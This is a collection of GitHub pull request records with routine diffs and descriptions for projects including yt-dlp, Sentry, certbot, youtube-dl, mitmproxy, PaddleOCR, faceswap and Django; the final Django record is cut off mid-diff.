traverse_obj(api_response, ('streamer', 'label')), + 'thumbnail': format_field(api_response, 'imageId', 'https://livestreamfails-image-prod.b-cdn.net/image/%s') + }
<!-- # Please follow the guide below - You will be asked some questions, please read them **carefully** and answer honestly - Put an `x` into all the boxes `[ ]` relevant to your *pull request* (like [x]) - Use *Preview* tab to see how your *pull request* will actually look like --> ### Before submitting a *pull request* make sure you have: - [x] At least skimmed through [contributing guidelines](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) including [yt-dlp coding conventions](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#yt-dlp-coding-conventions) - [x] [Searched](https://github.com/yt-dlp/yt-dlp/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests - [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8) and [ran relevant tests](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) ### In order to be accepted and merged into yt-dlp each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options: - [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/) - [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence) ### What is the purpose of your *pull request*? - [ ] Fix or improvement to an extractor (Make sure to add/update tests) - [x] New extractor ([Piracy websites will not be accepted](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#is-the-website-primarily-used-for-piracy)) - [ ] Core bug fix/improvement - [ ] New feature (It is strongly [recommended to open an issue first](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#adding-new-feature-or-making-overarching-changes)) --- ### Description of your *pull request* and other information Add an extractor for [Livestreamfails](https://livestreamfails.com/), a Twitch clip mirror site for [r/livestreamfail](https://reddit.com/r/LivestreamFail/).
https://api.github.com/repos/yt-dlp/yt-dlp/pulls/4204
2022-06-27T13:14:13Z
2022-06-29T00:11:38Z
2022-06-29T00:11:38Z
2022-06-29T00:11:38Z
646
yt-dlp/yt-dlp
8,273
feat: Add sentry apps to integration directory
diff --git a/src/sentry/static/sentry/app/views/organizationIntegrations/integrationListDirectory.tsx b/src/sentry/static/sentry/app/views/organizationIntegrations/integrationListDirectory.tsx index 47627e5306ad2..d8b8e56e07d31 100644 --- a/src/sentry/static/sentry/app/views/organizationIntegrations/integrationListDirectory.tsx +++ b/src/sentry/static/sentry/app/views/organizationIntegrations/integrationListDirectory.tsx @@ -24,7 +24,7 @@ import LoadingIndicator from 'app/components/loadingIndicator'; import MigrationWarnings from 'app/views/organizationIntegrations/migrationWarnings'; import PermissionAlert from 'app/views/settings/organization/permissionAlert'; import ProviderRow from 'app/views/organizationIntegrations/integrationProviderRow'; -import SentryAppInstallationDetail from 'app/views/organizationIntegrations/sentryAppInstallationDetail'; +import IntegrationDirectoryApplicationRow from 'app/views/settings/organizationDeveloperSettings/sentryApplicationRow/integrationDirectoryApplicationRow'; import SentryApplicationRow from 'app/views/settings/organizationDeveloperSettings/sentryApplicationRow'; import SentryDocumentTitle from 'app/components/sentryDocumentTitle'; import SentryTypes from 'app/sentryTypes'; @@ -190,15 +190,6 @@ class OrganizationIntegrations extends AsyncComponent< ); }; - handleRemoveAppInstallation = (app: SentryApp): void => { - const appInstalls = this.state.appInstalls.filter(i => i.app.slug !== app.slug); - this.setState({appInstalls}); - }; - - handleAppInstallation = (install: SentryAppInstallation): void => { - this.setState({appInstalls: [install, ...this.state.appInstalls]}); - }; - getAppInstall = (app: SentryApp) => { return this.state.appInstalls.find(i => i.app.slug === app.slug); }; @@ -233,13 +224,7 @@ class OrganizationIntegrations extends AsyncComponent< key={`row-${provider.key}`} data-test-id="integration-row" provider={provider} - orgId={this.props.params.orgId} integrations={integrations} - onInstall={this.onInstall} - onRemove={this.onRemove} - onDisable={this.onDisable} - onReinstall={this.onInstall} - newlyInstalledIntegrationId={this.state.newlyInstalledIntegrationId} /> ); }; @@ -247,7 +232,6 @@ class OrganizationIntegrations extends AsyncComponent< //render either an internal or non-internal app renderSentryApp = (app: SentryApp) => { const {organization} = this.props; - if (app.status === 'internal') { return ( <SentryApplicationRow @@ -261,19 +245,19 @@ class OrganizationIntegrations extends AsyncComponent< /> ); } - - return ( - <SentryAppInstallationDetail - key={`sentry-app-row-${app.slug}`} - data-test-id="integration-row" - api={this.api} - organization={organization} - install={this.getAppInstall(app)} - onAppUninstall={() => this.handleRemoveAppInstallation(app)} - onAppInstall={this.handleAppInstallation} - app={app} - /> - ); + if (app.status === 'published') { + return ( + <IntegrationDirectoryApplicationRow + key={`sentry-app-row-${app.slug}`} + data-test-id="integration-row" + organization={organization} + install={this.getAppInstall(app)} + app={app} + isOnIntegrationPage + /> + ); + } + return null; }; renderIntegration = (integration: AppOrProvider) => { diff --git a/src/sentry/static/sentry/app/views/organizationIntegrations/integrationProviderRow.tsx b/src/sentry/static/sentry/app/views/organizationIntegrations/integrationProviderRow.tsx index 6b8c5409041a2..2025d78ef8bd3 100644 --- a/src/sentry/static/sentry/app/views/organizationIntegrations/integrationProviderRow.tsx +++ 
b/src/sentry/static/sentry/app/views/organizationIntegrations/integrationProviderRow.tsx @@ -3,28 +3,16 @@ import PropTypes from 'prop-types'; import React from 'react'; import styled from '@emotion/styled'; import Link from 'app/components/links/link'; -import {openIntegrationDetails} from 'app/actionCreators/modal'; import {PanelItem} from 'app/components/panels'; import {t} from 'app/locale'; -import Button from 'app/components/button'; import CircleIndicator from 'app/components/circleIndicator'; -import InstalledIntegration, { - Props as InstalledIntegrationProps, -} from 'app/views/organizationIntegrations/installedIntegration'; import PluginIcon from 'app/plugins/components/pluginIcon'; import SentryTypes from 'app/sentryTypes'; import space from 'app/styles/space'; -import {growDown, highlight} from 'app/styles/animations'; import {IntegrationProvider, Integration} from 'app/types'; type Props = { provider: IntegrationProvider; - orgId: string; - onInstall: (integration: Integration) => void; - onRemove: (integration: Integration) => void; - onDisable: (integration: Integration) => void; - onReinstall: (integration: Integration) => void; - newlyInstalledIntegrationId: string; integrations: Integration[]; }; @@ -32,80 +20,36 @@ export default class ProviderRow extends React.Component<Props> { static propTypes = { provider: PropTypes.object.isRequired, integrations: PropTypes.array.isRequired, - orgId: PropTypes.string.isRequired, - onInstall: PropTypes.func.isRequired, - onRemove: PropTypes.func.isRequired, - onDisable: PropTypes.func.isRequired, - onReinstall: PropTypes.func.isRequired, - newlyInstalledIntegrationId: PropTypes.string, }; static contextTypes = { organization: SentryTypes.Organization, }; - get integrations() { - return this.props.integrations; - } - get isEnabled() { - return this.integrations.length > 0; - } - - // Actions - - openModal = () => { - const organization = this.context.organization; - const provider = this.props.provider; - const onAddIntegration = this.props.onInstall; - openIntegrationDetails({ - provider, - organization, - onAddIntegration, - isInstalled: this.isEnabled, - }); - }; - - // Rendering - - get buttonProps() { - return { - icon: 'icon-circle-add', - children: this.isEnabled ? 
t('Add Configuration') : t('Install'), - }; - } - - renderIntegrations() { - return this.integrations.map(integration => ( - <StyledInstalledIntegration - key={integration.id} - organization={this.context.organization} - provider={this.props.provider} - integration={integration} - onRemove={this.props.onRemove} - onDisable={this.props.onDisable} - onReinstallIntegration={this.props.onReinstall} - data-test-id={integration.id} - newlyAdded={integration.id === this.props.newlyInstalledIntegrationId} - /> - )); + return this.props.integrations.length > 0; } render() { + const {provider, integrations} = this.props; + const { + organization: {slug}, + } = this.context; return ( - <PanelItem p={0} flexDirection="column" data-test-id={this.props.provider.key}> + <PanelItem p={0} flexDirection="column" data-test-id={provider.key}> <Flex style={{alignItems: 'center', padding: '16px'}}> - <PluginIcon size={36} pluginId={this.props.provider.key} /> + <PluginIcon size={36} pluginId={provider.key} /> <div style={{flex: '1', padding: '0 16px'}}> - <ProviderName>{this.props.provider.name}</ProviderName> + <ProviderName to={`/settings/${slug}/integrations/${provider.key}`}> + {provider.name} + </ProviderName> <ProviderDetails> <Status enabled={this.isEnabled} /> - <StyledLink>{`${this.props.integrations.length} Configurations`}</StyledLink> + <StyledLink + to={`/settings/${slug}/integrations/${provider.key}?tab=configurations`} + >{`${integrations.length} Configurations`}</StyledLink> </ProviderDetails> </div> - <div> - <Button size="small" onClick={this.openModal} {...this.buttonProps} /> - </div> </Flex> </PanelItem> ); @@ -116,8 +60,9 @@ const Flex = styled('div')` display: flex; `; -const ProviderName = styled('div')` +const ProviderName = styled(Link)` font-weight: bold; + color: ${props => props.theme.textColor}; `; const ProviderDetails = styled(Flex)` @@ -162,29 +107,6 @@ const StatusWrapper = styled('div')` align-items: center; `; -const NewInstallation = styled('div')` - overflow: hidden; - transform-origin: 0 auto; - animation: ${growDown('59px')} 160ms 500ms ease-in-out forwards, - ${p => highlight(p.theme.yellowLightest)} 1000ms 500ms ease-in-out forwards; -`; - -const StyledInstalledIntegration = styled( - (p: InstalledIntegrationProps & {newlyAdded: boolean}) => - p.newlyAdded ? 
( - <NewInstallation> - <InstalledIntegration {...p} /> - </NewInstallation> - ) : ( - <InstalledIntegration {...p} /> - ) -)` - padding: ${space(2)}; - padding-left: 0; - margin-left: 68px; - border-top: 1px dashed ${p => p.theme.borderLight}; -`; - const StyledLink = styled(Link)` color: ${p => p.theme.gray2}; `; diff --git a/src/sentry/static/sentry/app/views/settings/organizationDeveloperSettings/sentryApplicationRow/integrationDirectoryApplicationRow.tsx b/src/sentry/static/sentry/app/views/settings/organizationDeveloperSettings/sentryApplicationRow/integrationDirectoryApplicationRow.tsx new file mode 100644 index 0000000000000..423348179e5f7 --- /dev/null +++ b/src/sentry/static/sentry/app/views/settings/organizationDeveloperSettings/sentryApplicationRow/integrationDirectoryApplicationRow.tsx @@ -0,0 +1,182 @@ +import React from 'react'; +import {Link} from 'react-router'; +import capitalize from 'lodash/capitalize'; +import omit from 'lodash/omit'; +import styled from '@emotion/styled'; +import PropTypes from 'prop-types'; + +import SentryTypes from 'app/sentryTypes'; +import {PanelItem} from 'app/components/panels'; +import {t} from 'app/locale'; +import space from 'app/styles/space'; +import CircleIndicator from 'app/components/circleIndicator'; +import PluginIcon from 'app/plugins/components/pluginIcon'; +import {Organization, SentryApp, SentryAppInstallation} from 'app/types'; +import theme from 'app/utils/theme'; + +const INSTALLED = 'Installed'; +const NOT_INSTALLED = 'Not Installed'; +const PENDING = 'Pending'; + +type Props = { + app: SentryApp; + organization: Organization; + install?: SentryAppInstallation; + isOnIntegrationPage: boolean; + ['data-test-id']?: string; +}; + +export default class SentryApplicationRow extends React.PureComponent<Props> { + static propTypes = { + app: SentryTypes.SentryApplication, + organization: SentryTypes.Organization.isRequired, + install: PropTypes.object, + isOnIntegrationPage: PropTypes.bool, + }; + + get isInternal() { + return this.props.app.status === 'internal'; + } + + hideStatus() { + //no publishing for internal apps so hide the status on the developer settings page + return this.isInternal && !this.props.isOnIntegrationPage; + } + + renderStatus() { + const {app, isOnIntegrationPage} = this.props; + const isInternal = this.isInternal; + const status = this.installationStatus; + if (this.hideStatus()) { + return null; + } + if (isOnIntegrationPage) { + return ( + <React.Fragment> + <StatusIndicator status={status} isInternal={isInternal} /> + </React.Fragment> + ); + } + return <PublishStatus status={app.status} />; + } + + get installationStatus() { + if (this.props.install) { + return capitalize(this.props.install.status); + } + + return NOT_INSTALLED; + } + + linkToEdit() { + const {isOnIntegrationPage} = this.props; + // show the link if the app is internal or we are on the developer settings page + // We don't want to show the link to edit on the main integrations list unless the app is internal + return this.isInternal || !isOnIntegrationPage; + } + + render() { + const {app, organization} = this.props; + return ( + <SentryAppItem data-test-id={app.slug}> + <StyledFlex> + <PluginIcon size={36} pluginId={app.slug} /> + <SentryAppBox> + <SentryAppName hideStatus={this.hideStatus()}> + {this.linkToEdit() ? 
( + <SentryAppLink + to={`/settings/${organization.slug}/developer-settings/${app.slug}/`} + > + {app.name} + </SentryAppLink> + ) : ( + <SentryAppLink + to={`/settings/${organization.slug}/sentry-apps/${app.slug}`} + > + {app.name} + </SentryAppLink> + )} + </SentryAppName> + <SentryAppDetails>{this.renderStatus()}</SentryAppDetails> + </SentryAppBox> + </StyledFlex> + </SentryAppItem> + ); + } +} + +const SentryAppItem = styled(PanelItem)` + flex-direction: column; + padding: 5px; +`; + +const StyledFlex = styled('div')` + display: flex; + justify-content: center; + padding: 10px; +`; + +const SentryAppBox = styled('div')` + padding-left: 15px; + padding-right: 15px; + flex: 1; +`; + +const SentryAppDetails = styled('div')` + display: flex; + align-items: center; + margin-top: 6px; + font-size: 0.8em; +`; + +const SentryAppName = styled('div')<{hideStatus: boolean}>` + font-weight: bold; + margin-top: ${p => (p.hideStatus ? '10px' : '0px')}; +`; + +const SentryAppLink = styled(Link)` + color: ${props => props.theme.textColor}; +`; + +const FlexContainer = styled('div')` + display: flex; + align-items: center; +`; +const color = { + [INSTALLED]: 'success', + [NOT_INSTALLED]: 'gray2', + [PENDING]: 'yellowOrange', +}; + +type StatusIndicatorProps = {status: string; theme?: any; isInternal: boolean}; + +const StatusIndicator = styled(({status, ...props}: StatusIndicatorProps) => { + //need to omit isInternal + const propsToPass = omit(props, ['isInternal']); + return ( + <FlexContainer> + <CircleIndicator size={6} color={theme[color[status]]} /> + <div {...propsToPass}>{t(`${status}`)}</div> + </FlexContainer> + ); +})` + color: ${(props: StatusIndicatorProps) => props.theme[color[props.status]]}; + margin-left: ${space(0.5)}; + font-weight: light; + margin-right: ${space(0.75)}; +`; + +type PublishStatusProps = {status: SentryApp['status']; theme?: any}; + +const PublishStatus = styled(({status, ...props}: PublishStatusProps) => { + return ( + <FlexContainer> + <div {...props}>{t(`${status}`)}</div> + </FlexContainer> + ); +})` + color: ${(props: PublishStatusProps) => + props.status === 'published' ? props.theme.success : props.theme.gray2}; + font-weight: light; + margin-right: ${space(0.75)}; +`;
## Problem Add sentry apps to the integration directory and remove buttons from the right side of the list. ## Solution Created new files for the IntegrationDirectoryApplicationRow view. Selectively deleted methods, props, and components related to the `Install`/`Add Another` buttons on the right side of the list. ## UI <img width="1440" alt="Screen Shot 2020-01-30 at 2 56 55 PM" src="https://user-images.githubusercontent.com/10491193/73497954-d492a580-4370-11ea-92f8-d07f8f4b12d1.png">
https://api.github.com/repos/getsentry/sentry/pulls/16739
2020-01-30T22:57:43Z
2020-01-31T18:13:14Z
2020-01-31T18:13:14Z
2023-05-17T22:06:19Z
3,775
getsentry/sentry
44,170
Alternate help syntax - issue 3371
diff --git a/certbot/cli.py b/certbot/cli.py index d51fd58e06d..4aeac6d348f 100644 --- a/certbot/cli.py +++ b/certbot/cli.py @@ -432,6 +432,10 @@ def __init__(self, args, plugins, detect_defaults=False): self.detect_defaults = detect_defaults self.args = args + + if self.args[0] == 'help': + self.args[0] = '--help' + self.determine_verb() help1 = self.prescan_for_flag("-h", self.help_topics) help2 = self.prescan_for_flag("--help", self.help_topics) diff --git a/certbot/tests/cli_test.py b/certbot/tests/cli_test.py index b0eb965426b..1fa2004d3a7 100644 --- a/certbot/tests/cli_test.py +++ b/certbot/tests/cli_test.py @@ -131,6 +131,26 @@ def test_help(self): self.assertTrue("%s" not in out) self.assertTrue("{0}" not in out) + def test_help_no_dashes(self): + self._help_output(['help']) # assert SystemExit is raised here + + out = self._help_output(['help', 'all']) + self.assertTrue("--configurator" in out) + self.assertTrue("how a cert is deployed" in out) + self.assertTrue("--webroot-path" in out) + self.assertTrue("--text" not in out) + self.assertTrue("--dialog" not in out) + self.assertTrue("%s" not in out) + self.assertTrue("{0}" not in out) + + out = self._help_output(['help', 'install']) + self.assertTrue("--cert-path" in out) + self.assertTrue("--key-path" in out) + + out = self._help_output(['help', 'revoke']) + self.assertTrue("--cert-path" in out) + self.assertTrue("--key-path" in out) + def test_parse_domains(self): short_args = ['-d', 'example.com'] namespace = self.parse(short_args)
I originally followed the approach detailed in the first comment here: https://github.com/certbot/certbot/issues/3371, but realized there was a much shorter way to implement this. (Can easily switch back to the other approach if need be.) Also, `certbot help --help help -h standalone` works!
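For illustration, a minimal standalone sketch of the same pattern (rewriting a bare leading `help` verb into `--help` before argparse parses the arguments), using hypothetical names rather than certbot's actual CLI plumbing:

```python
import argparse

def normalize_help(argv):
    """Alias a bare leading 'help' verb to '--help' so both spellings work."""
    argv = list(argv)
    if argv and argv[0] == "help":
        argv[0] = "--help"
    return argv

parser = argparse.ArgumentParser(prog="demo")
parser.add_argument("topic", nargs="?")
print(normalize_help(["help", "all"]))           # ['--help', 'all']
# parser.parse_args(normalize_help(["help"]))    # prints usage and exits, like -h
```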
https://api.github.com/repos/certbot/certbot/pulls/4068
2017-01-17T17:22:07Z
2017-01-17T23:19:34Z
2017-01-17T23:19:34Z
2017-01-17T23:19:34Z
478
certbot/certbot
3,228
[pornhub] Fixed view count extraction
diff --git a/youtube_dl/extractor/pornhub.py b/youtube_dl/extractor/pornhub.py index 3567a32839e..c64c870dc8e 100644 --- a/youtube_dl/extractor/pornhub.py +++ b/youtube_dl/extractor/pornhub.py @@ -341,7 +341,7 @@ def add_video_url(video_url): webpage, 'uploader', fatal=False) view_count = self._extract_count( - r'<span class="count">([\d,\.]+)</span> views', webpage, 'view') + r'<span class="count">([\d,\.]+)</span> [Vv]iews', webpage, 'view') like_count = self._extract_count( r'<span class="votesUp">([\d,\.]+)</span>', webpage, 'like') dislike_count = self._extract_count(
### Before submitting a *pull request* make sure you have: - [x] At least skimmed through [adding new extractor tutorial](https://github.com/ytdl-org/youtube-dl#adding-support-for-a-new-site) and [youtube-dl coding conventions](https://github.com/ytdl-org/youtube-dl#youtube-dl-coding-conventions) sections - [x] [Searched](https://github.com/ytdl-org/youtube-dl/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests - [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8) ### In order to be accepted and merged into youtube-dl each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options: - [ ] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/) - [x] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence) ### What is the purpose of your *pull request*? - [x] Bug fix --- ### Description of your *pull request* and other information Since the UI change of Pornhub, the 'v' in the view count is spelled with a capital 'V'. I rewrote the regex to match both a lowercase 'v' and a capital 'V' to fix the view count extraction.
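A quick standalone check of the widened character class (the sample markup here is made up for the example):

```python
import re

PATTERN = r'<span class="count">([\d,\.]+)</span> [Vv]iews'

old_markup = '<span class="count">1,234,567</span> views'
new_markup = '<span class="count">1,234,567</span> Views'

for markup in (old_markup, new_markup):
    match = re.search(PATTERN, markup)
    print(match.group(1) if match else 'no match')   # both print 1,234,567
```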
https://api.github.com/repos/ytdl-org/youtube-dl/pulls/26621
2020-09-18T22:09:06Z
2020-09-18T22:59:19Z
2020-09-18T22:59:19Z
2020-09-18T22:59:19Z
202
ytdl-org/youtube-dl
50,504
[bug fix]rm invalid params
diff --git a/ppstructure/utility.py b/ppstructure/utility.py index a1e29344cb..28ef3d9f47 100644 --- a/ppstructure/utility.py +++ b/ppstructure/utility.py @@ -16,7 +16,7 @@ import PIL from PIL import Image, ImageDraw, ImageFont import numpy as np -from tools.infer.utility import draw_ocr_box_txt, str2bool, str2int_tuple, init_args as infer_args +from tools.infer.utility import draw_ocr_box_txt, str2bool, init_args as infer_args import math
https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/10605
2023-08-10T09:03:39Z
2023-08-11T06:12:26Z
2023-08-11T06:12:26Z
2024-03-08T03:11:16Z
131
PaddlePaddle/PaddleOCR
42,227
Change example URLs in readme (fixes #5018)
diff --git a/README.md b/README.md index a2c1483117c..8ea31d6059f 100644 --- a/README.md +++ b/README.md @@ -571,7 +571,7 @@ Support requests for services that **do** purchase the rights to distribute thei ### How can I detect whether a given URL is supported by youtube-dl? -For one, have a look at the [list of supported sites](docs/supportedsites.md). Note that it can sometimes happen that the site changes its URL scheme (say, from http://example.com/v/1234567 to http://example.com/v/1234567 ) and youtube-dl reports an URL of a service in that list as unsupported. In that case, simply report a bug. +For one, have a look at the [list of supported sites](docs/supportedsites.md). Note that it can sometimes happen that the site changes its URL scheme (say, from http://example.com/video/1234567 to http://example.com/v/1234567 ) and youtube-dl reports an URL of a service in that list as unsupported. In that case, simply report a bug. It is *not* possible to detect whether a URL is supported or not. That's because youtube-dl contains a generic extractor which matches **all** URLs. You may be tempted to disable, exclude, or remove the generic extractor, but the generic extractor not only allows users to extract videos from lots of websites that embed a video from another service, but may also be used to extract video from a service that it's hosting itself. Therefore, we neither recommend nor support disabling, excluding, or removing the generic extractor.
https://api.github.com/repos/ytdl-org/youtube-dl/pulls/5019
2015-02-20T22:47:52Z
2015-02-20T22:56:57Z
2015-02-20T22:56:57Z
2015-02-20T22:56:58Z
361
ytdl-org/youtube-dl
49,764
Make log truncation configurable
diff --git a/mitmproxy/proxy/layer.py b/mitmproxy/proxy/layer.py index 275125a3f8..27328c4fc7 100644 --- a/mitmproxy/proxy/layer.py +++ b/mitmproxy/proxy/layer.py @@ -27,6 +27,10 @@ """ +MAX_LOG_STATEMENT_SIZE = 512 +"""Maximum size of individual log statements before they will be truncated.""" + + class Paused(NamedTuple): """ State of a layer that's paused because it is waiting for a command reply. @@ -97,8 +101,8 @@ def __repr__(self): def __debug(self, message): """yield a Log command indicating what message is passing through this layer.""" - if len(message) > 512: - message = message[:512] + "…" + if len(message) > MAX_LOG_STATEMENT_SIZE: + message = message[:MAX_LOG_STATEMENT_SIZE] + "…" if Layer.__last_debug_message == message: message = message.split("\n", 1)[0].strip() if len(message) > 256:
Provide addons with the means to disable log truncation. We're in a pretty hot path here, so we'll keep this as a constant instead of a full-blown mitmproxy option. /cc @erikshestopal
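A sketch of how an addon script could raise the limit, assuming the constant remains importable from `mitmproxy.proxy.layer` as in this diff (the addon scaffolding here is just an example, not a documented option):

```python
from mitmproxy.proxy import layer

# MAX_LOG_STATEMENT_SIZE is a plain module-level constant, so patching it once
# at import time affects all later debug log statements.
layer.MAX_LOG_STATEMENT_SIZE = 10_000


class VerboseProxyLogs:
    def load(self, loader):
        pass  # nothing else to configure; the patched constant is already in effect


addons = [VerboseProxyLogs()]
```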
https://api.github.com/repos/mitmproxy/mitmproxy/pulls/6288
2023-08-01T09:31:41Z
2023-08-01T10:14:02Z
2023-08-01T10:14:02Z
2023-08-01T11:37:21Z
253
mitmproxy/mitmproxy
27,751
extend estimation of area under curve of y=x using monte carlo simulation to any given lower and upper bound
diff --git a/maths/monte_carlo.py b/maths/monte_carlo.py index 4980c5c55c8c..6a407e98badd 100644 --- a/maths/monte_carlo.py +++ b/maths/monte_carlo.py @@ -42,29 +42,34 @@ def area_under_line_estimator(iterations: int, An implementation of the Monte Carlo method to find area under y = x where x lies between min_value to max_value 1. Let x be a uniformly distributed random variable between min_value to max_value - 2. Expected value of x = integration of x from min_value to max_value + 2. Expected value of x = (integration of x from min_value to max_value) / (max_value - min_value) 3. Finding expected value of x: a. Repeatedly draw x from uniform distribution b. Expected value = average of those values - 4. Actual value = 1/2 + 4. Actual value = (max_value^2 - min_value^2) / 2 5. Returns estimated value """ - return mean(uniform(min_value, max_value) for _ in range(iterations)) + return mean(uniform(min_value, max_value) for _ in range(iterations)) * (max_value - min_value) -def area_under_line_estimator_check(iterations: int) -> None: +def area_under_line_estimator_check(iterations: int, + min_value: float=0.0, + max_value: float=1.0) -> None: """ Checks estimation error for area_under_line_estimator func 1. Calls "area_under_line_estimator" function 2. Compares with the expected value 3. Prints estimated, expected and error value """ - estimate = area_under_line_estimator(iterations) + + estimated_value = area_under_line_estimator(iterations, min_value, max_value) + expected_value = (max_value*max_value - min_value*min_value) / 2 + print("******************") - print("Estimating area under y=x where x varies from 0 to 1") - print("Expected value is ", 0.5) - print("Estimated value is ", estimate) - print("Total error is ", abs(estimate - 0.5)) + print("Estimating area under y=x where x varies from ",min_value, " to ",max_value) + print("Estimated value is ", estimated_value) + print("Expected value is ", expected_value) + print("Total error is ", abs(estimated_value - expected_value)) print("******************")
Extend the estimation of the area under the curve y=x using Monte Carlo simulation to any given lower and upper bound. ### **Checklist:** * [x] I have read [CONTRIBUTING.md](https://github.com/TheAlgorithms/Python/blob/master/CONTRIBUTING.md). * [x] This pull request is all my own work -- I have not plagiarized. * [x] I know that pull requests will not be merged if they fail the automated tests. * [x] This PR only changes one algorithm file. To ease review, please open separate PRs for separate algorithms. * [x] All new Python files are placed inside an existing directory. * [x] All filenames are in all lowercase characters with no spaces or dashes. * [x] All functions and variable names follow Python naming conventions. * [x] All function parameters and return values are annotated with Python [type hints](https://docs.python.org/3/library/typing.html). * [ ] All functions have [doctests](https://docs.python.org/3/library/doctest.html) that pass the automated testing. * [ ] All new algorithms have a URL in its comments that points to Wikipedia or other similar explanation. * [ ] If this pull request resolves one or more open issues then the commit message contains `Fixes: #{$ISSUE_NO}`.
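For readers who want to try the extended estimator outside the repository, a self-contained sketch of the same idea (simplified from the diff above):

```python
from random import uniform
from statistics import mean

def area_under_line_estimator(iterations: int,
                              min_value: float = 0.0,
                              max_value: float = 1.0) -> float:
    """Monte Carlo estimate of the integral of y = x over [min_value, max_value].

    E[X] for X ~ Uniform(a, b) is (a + b) / 2, so E[X] * (b - a) equals
    (b**2 - a**2) / 2, the exact area under y = x on that interval.
    """
    return mean(uniform(min_value, max_value) for _ in range(iterations)) * (
        max_value - min_value
    )

estimate = area_under_line_estimator(100_000, 2.0, 5.0)
print(estimate)   # close to (5**2 - 2**2) / 2 = 10.5
```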
https://api.github.com/repos/TheAlgorithms/Python/pulls/1784
2020-02-22T18:52:04Z
2020-02-22T22:33:13Z
2020-02-22T22:33:13Z
2020-02-22T23:35:44Z
597
TheAlgorithms/Python
29,720
OriginalHighRes 128 model update
diff --git a/plugins/Model_OriginalHighRes/Trainer.py b/plugins/Model_OriginalHighRes/Trainer.py index e05f90a334..259dcdf4a3 100644 --- a/plugins/Model_OriginalHighRes/Trainer.py +++ b/plugins/Model_OriginalHighRes/Trainer.py @@ -1,13 +1,11 @@ import time - import numpy from lib.training_data import TrainingDataGenerator, stack_images TRANSFORM_PRC = 115. -#TRANSFORM_PRC = 150. class Trainer(): @@ -22,13 +20,15 @@ class Trainer(): def __init__(self, model, fn_A, fn_B, batch_size, *args): self.batch_size = batch_size self.model = model + from timeit import default_timer as clock + self._clock = clock + - #generator = TrainingDataGenerator(self.random_transform_args, 160) - + #generator = TrainingDataGenerator(self.random_transform_args, 160) # make sre to keep zoom=2 or you won't get 128x128 vectors as input #generator = TrainingDataGenerator(self.random_transform_args, 220, 5, zoom=2) - generator = TrainingDataGenerator(self.random_transform_args, 160, 6, zoom=2) #generator = TrainingDataGenerator(self.random_transform_args, 180, 7, zoom=2) + generator = TrainingDataGenerator(self.random_transform_args, 160, 5, zoom=2) self.images_A = generator.minibatchAB(fn_A, self.batch_size) self.images_B = generator.minibatchAB(fn_B, self.batch_size) @@ -37,19 +37,19 @@ def __init__(self, model, fn_A, fn_B, batch_size, *args): def train_one_step(self, iter_no, viewer): - + when = self._clock() _, warped_A, target_A = next(self.images_A) _, warped_B, target_B = next(self.images_B) loss_A = self.model.autoencoder_A.train_on_batch(warped_A, target_A) loss_B = self.model.autoencoder_B.train_on_batch(warped_B, target_B) - - print("[{0}] [#{1:05d}] loss_A: {2:.5f}, loss_B: {3:.5f}".format( - time.strftime("%H:%M:%S"), iter_no, loss_A, loss_B), + + print("[{0}] [#{1:05d}] [{2:.3f}s] loss_A: {3:.5f}, loss_B: {4:.5f}".format( + time.strftime("%H:%M:%S"), iter_no, self._clock()-when, loss_A, loss_B), end='\r') if viewer is not None: - viewer(self.show_sample(target_A[0:24], target_B[0:24]), "training using {}, bs={}".format(self.model, self.batch_size)) + viewer(self.show_sample(target_A[0:8], target_B[0:8]), "training using {}, bs={}".format(self.model, self.batch_size)) def show_sample(self, test_A, test_B):
Required for OriginalHighRes Model to function
https://api.github.com/repos/deepfakes/faceswap/pulls/418
2018-06-12T10:19:42Z
2018-06-14T22:34:56Z
2018-06-14T22:34:55Z
2018-06-15T12:46:40Z
724
deepfakes/faceswap
18,709
Fixed #34063 -- Made AsyncClient populate request.POST from form data body.
diff --git a/django/test/client.py b/django/test/client.py index 99e831aebda85..8b926fc38de75 100644 --- a/django/test/client.py +++ b/django/test/client.py @@ -14,7 +14,7 @@ from django.conf import settings from django.core.handlers.asgi import ASGIRequest from django.core.handlers.base import BaseHandler -from django.core.handlers.wsgi import WSGIRequest +from django.core.handlers.wsgi import LimitedStream, WSGIRequest from django.core.serializers.json import DjangoJSONEncoder from django.core.signals import got_request_exception, request_finished, request_started from django.db import close_old_connections @@ -198,7 +198,8 @@ async def __call__(self, scope): sender=self.__class__, scope=scope ) request_started.connect(close_old_connections) - request = ASGIRequest(scope, body_file) + # Wrap FakePayload body_file to allow large read() in test environment. + request = ASGIRequest(scope, LimitedStream(body_file, len(body_file))) # Sneaky little hack so that we can easily get round # CsrfViewMiddleware. This makes life easier, and is probably required # for backwards compatibility with external tests against admin views. @@ -598,7 +599,10 @@ def request(self, **request): body_file = request.pop("_body_file") else: body_file = FakePayload("") - return ASGIRequest(self._base_scope(**request), body_file) + # Wrap FakePayload body_file to allow large read() in test environment. + return ASGIRequest( + self._base_scope(**request), LimitedStream(body_file, len(body_file)) + ) def generic( self, diff --git a/tests/test_client/tests.py b/tests/test_client/tests.py index 57dc22ea0c34c..5612ae4462d31 100644 --- a/tests/test_client/tests.py +++ b/tests/test_client/tests.py @@ -1103,6 +1103,14 @@ async def test_get_data(self): response = await self.async_client.get("/get_view/", {"var": "val"}) self.assertContains(response, "This is a test. val is the value.") + async def test_post_data(self): + response = await self.async_client.post("/post_view/", {"value": 37}) + self.assertContains(response, "Data received: 37 is the value.") + + async def test_body_read_on_get_data(self): + response = await self.async_client.get("/post_view/") + self.assertContains(response, "Viewing GET page.") + @override_settings(ROOT_URLCONF="test_client.urls") class 